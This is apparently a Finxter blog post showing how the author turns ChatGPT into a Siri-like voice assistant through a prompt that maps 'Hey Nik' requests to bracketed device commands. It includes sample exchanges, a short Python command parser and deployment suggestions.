If you want to improve your web scraping skills, check out the following course on the Finxter academy:

Posted on Leave a comment

How I Built a Virtual Assistant like Siri using ChatGPT Prompting (No Code!)

5/5 – (2 votes)

Siri sucks. 😞

I am a Siri user, and Siri fails me more than it performs for me. It doesn’t understand the chain of commands.

Project Idea: Recreate Siri Using ChatGPT

This got me thinking, “What if I can repurpose ChatGPT to work like Siri?”. So before I show you what the prompt looks like, this is what the chatbot can recognise in the most natural form:

  • Increase volume
  • Decrease volume
  • Play movie
  • Pause or stop the movie
  • Open an app
  • Book a movie or movie ticket
  • Play song
  • Book a cab
  • Call someone
  • Set a reminder
  • Send a message
  • Set an alarm
  • Open a website
  • Get directions
  • Check the weather

To trigger these commands, the user needs to begin the instruction with "Hey Nik".

Let me begin by showing you the most complicated instruction it can handle.

Prompt First Trial – Not Perfect Yet


Nik: Assume it’s sunny. Hey Nik check the weather for me and if it’s sunny book a cab to go to the beach, play song california love by 2Pac

ChatGPT: Hey there! The weather today is sunny. Sure, I can check the weather for you and book a cab to the beach if it’s sunny. Here are the commands:

[WEATHER] [OPENAPP UBER] [PLAYSONG CALIFORNIA LOVE BY 2PAC]

Please note that the cab booking will not be completed as this is a simulated environment.

ChatGPT is not aware of my environment, hence I had to tell it that it’s sunny. Then I start the actual instruction with "Hey Nik...". In contrast, Google Assistant and Siri cannot handle this kind of chained command.

After a good deal of prompt engineering, I came up with the following prompt that could be used by an app to not only detect user meaning but also respond accordingly — without needing to create a single line of code to accomplish this magic!

ChatGPT truly can be used as the heart of many applications — not just to create them!

Final Prompt

You can copy and paste this prompt in case you want to reuse it to build your own Siri replacement:

Nik: I want you to be an interactive chatbot that responds to predefined instructions. The instructions and their respective commands are:

Increase volume: [INCREASEVOLUME]
Decrease volume: [DECREASEVOLUME]
Play movie [MOVIE NAME]: [PLAYMOVIE [MOVIE NAME]]
Pause or stop the movie: [STOPMOVIE]
Open an app [APP NAME]: [OPENAPP [APP NAME]]
Book a movie or movie ticket: [OPENAPP BOOKMYSHOW]
Play song [song or artist name]: [PLAYSONG [song or artist name]]
Book a cab: [OPENAPP UBER]
Call someone [NAME]: [CALL [NAME]]
Set a reminder [TIME] [REMINDER]: [SETREMINDER [TIME] [REMINDER]]
Send a message [NAME] [MESSAGE]: [SENDMESSAGE [NAME] [MESSAGE]]
Set an alarm - [SETALARM [time]]
Open a website - [OPEN [website name]]
Get directions - [DIRECTIONTO [location]]
Check the weather - [WEATHER]

Here are some conditions to consider:

If the instruction includes a number or percentage when using INCREASEVOLUME or DECREASEVOLUME, append it to the command.
If the instruction includes the name of an app when using OPENAPP, append it to the command.

To trigger these commands, begin the instruction with "Hey Nik". Please note that commands will be in square brackets, with spaces removed except for messages or names. Your response should contain an acknowledgement in English and below it should be the sequence of commands. After you display the commands do not print anything else.

I came up with the following commands on the first attempt:

  • Increase volume: [INCREASEVOLUME]
  • Decrease volume: [DECREASEVOLUME]
  • Play movie [MOVIE NAME]: [PLAYMOVIE [MOVIE NAME]]
  • Pause or stop the movie: [STOPMOVIE]
  • Open an app [APP NAME]: [OPENAPP [APP NAME]]
  • Book a movie or movie ticket: [OPENAPP BOOKMYSHOW]
  • Play song [song or artist name]: [PLAYSONG [song or artist name]]
  • Book a cab: [OPENAPP UBER]

After I perfected the results, I wanted to see if ChatGPT could add more commands, so I tried the following prompt:

Refinement Prompt

Nik: Can you add more commands in the style given to the prompt. Take inspiration from "ok google" and "hey siri". Please write in English language.

ChatGPT: Sure, I can add more commands in the style given to the prompt! Here are some additional commands you can use:

To set a reminder, say "Hey Nik, set a reminder for [time] to [task]". For example, "Hey Nik, set a reminder for 2pm to attend a meeting".
To check the weather, say "Hey Nik, what's the weather like today?".
To get directions, say "Hey Nik, how do I get to [location]?". For example, "Hey Nik, how do I get to Central Park?".
To set an alarm, say "Hey Nik, set an alarm for [time]". For example, "Hey Nik, set an alarm for 7am".
To send a message, say "Hey Nik, send a message to [contact name]". You will then be prompted to dictate the message and confirm before sending.
To open a website, say "Hey Nik, open [website name]". For example, "Hey Nik, open Google".

Remember to begin each command with "Hey Nik" for the chatbot to respond. I hope these additional commands are helpful!

Nik: Ok now generate the original prompt with the newly added commands. Please write in English language.

My Personal Considerations and Findings Using This Prompt

I am impressed with ChatGPT’s ability to generate a more user-friendly and straightforward set of commands. And it also kept modifying my original prompt to include these commands. 

But, I realized that there were some conditions that I needed to consider, such as:

  • If the instruction includes a number or percentage when using INCREASEVOLUME or DECREASEVOLUME, append it to the command.
  • If the instruction includes the name of an app when using OPENAPP, append it to the command.

With these conditions in mind, I combined the original set of commands with the new commands generated by ChatGPT and added the necessary conditions to create a more comprehensive and user-friendly prompt.

As I developed the chatbot, I discovered that one of its most significant advantages over Siri was its ability to handle an unlimited set of inputs. Siri, on the other hand, works with one command at a time, which can be limiting for users who want to execute multiple tasks in one go.

Here are some examples of user inputs and their respective responses:

User Input: Hey Nik, play movie The Shawshank Redemption
Response: [PLAYMOVIE The Shawshank Redemption]

User Input: Hey Nik, increase volume by 50 percent
Response: [INCREASEVOLUME 50 percent]

User Input: Hey Nik, send a message to John saying I will be there in 10 minutes
Response: [SENDMESSAGE John I will be there in 10 minutes]

User Input: Hey Nik, what is the weather like in New York?
Response: [WEATHER New York]

Here is an example of the user input and response for the “play song” command:

User input: Hey Nik, play song Shape of You by Ed Sheeran
Response: Playing Shape of You by Ed Sheeran
Command: [PLAYSONG Shape of You by Ed Sheeran]

And here is an example of the user input and response for the "open an app" command:

User input: Hey Nik, open app Netflix
Response: Opening Netflix
Command: [OPEN APP NETFLIX]
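
An app built around this prompt would still need one small piece of logic: pulling the bracketed commands out of ChatGPT’s reply. Here is a minimal sketch of that step, assuming the square-bracket format defined in the prompt (the function name is hypothetical). A simple bracket-depth scan is used instead of a regex so that nested placeholders like [PLAYMOVIE [MOVIE NAME]] stay intact:

```python
def extract_commands(response: str):
    """Pull top-level [COMMAND ...] tokens out of a chatbot response."""
    commands = []
    depth = 0
    start = None
    for i, ch in enumerate(response):
        if ch == "[":
            if depth == 0:
                start = i  # remember where a top-level command begins
            depth += 1
        elif ch == "]":
            depth -= 1
            if depth == 0 and start is not None:
                commands.append(response[start:i + 1])
                start = None
    return commands

reply = ("Hey there! The weather today is sunny. Here are the commands:\n"
         "[WEATHER] [OPENAPP UBER] [PLAYSONG CALIFORNIA LOVE BY 2PAC]")
print(extract_commands(reply))
# ['[WEATHER]', '[OPENAPP UBER]', '[PLAYSONG CALIFORNIA LOVE BY 2PAC]']
```

Each extracted command could then be mapped to the corresponding device action (volume, app launch, and so on) by the host app.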

How to Deploy This

To deploy it as an app, you can use the ChatGPT API + Promptable + any no-code app builder. The app can be deployed on iPhone, but there are many permissions that need to be worked out.

A similar version of this may work on Android as it is more open.
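
For the ChatGPT API side of such a deployment, the wiring could look like the sketch below. This is a hypothetical illustration using the pre-1.0 `openai` Python package’s chat format; `SYSTEM_PROMPT` stands in for the full “Hey Nik” prompt shown above (abbreviated here), and only the payload construction is executed:

```python
# Abbreviated stand-in for the full "Hey Nik" prompt from the Final Prompt section.
SYSTEM_PROMPT = (
    "I want you to be an interactive chatbot that responds to predefined "
    "instructions. ... To trigger these commands, begin the instruction "
    'with "Hey Nik".'
)

def build_request(user_instruction: str) -> dict:
    """Assemble the payload an app would send to the chat completions API."""
    return {
        "model": "gpt-3.5-turbo",
        "messages": [
            {"role": "system", "content": SYSTEM_PROMPT},
            {"role": "user", "content": user_instruction},
        ],
    }

request = build_request("Hey Nik, book a cab")
# The app would then send it, e.g. (requires an OpenAI API key):
#   response = openai.ChatCompletion.create(**request)
#   commands = response["choices"][0]["message"]["content"]
print(request["messages"][1]["content"])  # Hey Nik, book a cab
```

Putting the prompt in the system message means every user utterance is interpreted against the command vocabulary without re-sending the instructions each time.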

πŸ‘‰ Recommended: ChatGPT at the Heart – Building a Movie Recommendation Python Web App